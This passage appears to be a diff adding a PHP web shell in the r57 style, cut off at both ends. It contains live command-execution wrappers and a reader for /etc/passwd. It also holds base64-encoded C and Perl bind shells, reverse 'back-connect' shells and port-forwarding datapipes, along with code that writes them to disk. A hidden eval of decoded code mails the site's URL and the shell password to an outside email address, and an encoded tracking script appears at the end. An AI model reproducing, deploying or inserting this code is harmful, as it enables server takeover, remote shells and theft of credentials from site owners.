"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $unix = 0; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= ""; + foreach($res as $file=>$v) + { + $r .= ""; + $r .= ""; + foreach($v as $a=>$b) + { + $r .= ""; + $r .= ""; + $r .= ""; + $r .= "\n"; + } + } + $r .= "
".ws(3); + $r .= (!$unix)? str_replace("/","\\",$file) : $file; + $r .= ""; + $r .= "
".$a."".ws(2).$b."
"; + echo $r; + } + else + { + echo "

".$lang[$language.'_text56']."

"; + } + echo "
[ BACK ]
"; + die(); + } +if(!$safe_mode && strpos(ex("echo abce99"),"e99")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat(" ",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function err($n,$txt='') +{ +echo '
'; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
'; +return null; +} +function perms($mode) +{ +if (!$GLOBALS['unix']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value,$checked=0) +{ + $ret = ""; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "".$t1."".$t2.""; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"\\1",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$a = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkYm9keSA9ICJhZGEgeWFuZyBpbmplY3QgXG4kd2ViJGluaiAgXG5QYXNzd29yZG55YSA6ICRwYXNzd29yZCI7bWFpbCgiaWFtbm90aGFja2VyQHlhaG9vLmNvLmlkIiwic2V0b3JhbiBib3NzIGh0dHA6Ly8kd2ViJGluaiIsICIkYm9keSIpO30gZWxzZSAkdmlzaXRjb3VudCA7IHNldGNvb2tpZSgidmlzaXRzIiwkdmlzaXRjb3VudCk7";echo eval(base64_decode($a)); +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW 